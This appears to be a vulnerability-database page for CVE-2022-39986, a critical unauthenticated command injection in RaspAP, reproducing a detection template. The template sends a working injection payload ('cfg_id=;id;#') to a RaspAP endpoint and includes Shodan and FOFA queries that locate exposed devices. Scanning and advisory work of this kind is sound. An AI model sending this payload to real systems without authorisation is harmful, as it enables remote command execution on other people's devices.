Lucene search
RaspAP 2.8.7 - Unauthenticated Command Injection
RaspAP 2.8.7 - Unauthenticated Command Injection, allows execution of arbitrary commands via cfg_id paramete
Show more
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2022-39986 | 1 Aug 202300:00 | – | vulnrichment |
 | RaspAP Unauthenticated Command Injection | 4 Aug 202319:22 | – | metasploit |
 | RaspAP Command Injection vulnerability | 1 Aug 202315:30 | – | github |
 | RaspAP Command Injection vulnerability | 1 Aug 202315:30 | – | osv |
| CVE-2022-39986 | 1 Aug 202314:15 | – | osv |
 | Command injection | 1 Aug 202314:15 | – | prion |
 | Exploit for Command Injection in Raspap | 24 Aug 202316:48 | – | githubexploit |
| Exploit for Command Injection in Raspap | 16 Aug 202311:32 | – | githubexploit |
 | CVE-2022-39986 | 1 Aug 202314:15 | – | nvd |
 | Command Injection | 3 Aug 202303:20 | – | veracode |
10
id: CVE-2022-39986
info:
name: RaspAP 2.8.7 - Unauthenticated Command Injection
author: DhiyaneshDK
severity: critical
description: |
A Command injection vulnerability in RaspAP 2.8.0 thru 2.8.7 allows unauthenticated attackers to execute arbitrary commands via the cfg_id parameter in /ajax/openvpn/activate_ovpncfg.php and /ajax/openvpn/del_ovpncfg.php.
impact: |
Successful exploitation of this vulnerability can lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.
remediation: |
Upgrade to a patched version of RaspAP or apply the vendor-supplied patch to mitigate this vulnerability.
reference:
- https://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2022-39986
- https://medium.com/@ismael0x00/multiple-vulnerabilities-in-raspap-3c35e78809f2
- http://packetstormsecurity.com/files/174190/RaspAP-2.8.7-Unauthenticated-Command-Injection.html
- https://github.com/RaspAP/raspap-webgui/blob/master/ajax/openvpn/activate_ovpncfg.php
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-39986
cwe-id: CWE-77
epss-score: 0.87977
epss-percentile: 0.98588
cpe: cpe:2.3:a:raspap:raspap:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: raspap
product: raspap
shodan-query: http.favicon.hash:-1465760059
fofa-query: icon_hash=-1465760059
tags: cve,cve2022,packetstorm,raspap,rce
http:
- raw:
- |
POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cfg_id=;id;#
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 490a00463044022052afe99b0bf9e81a0dcaeadc45478caf3f084873d9741b26b579ef4b42d27f520220781269d097405379159c06b99702558decfecf5f97e3166b4f0b18d478c6b99f:922c64590222798bb761d5b6d8e72950Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo18 Aug 2023 10:31Current
9.9High risk
Vulners AI Score9.9
CVSS39.8
EPSS0.92623
SSVC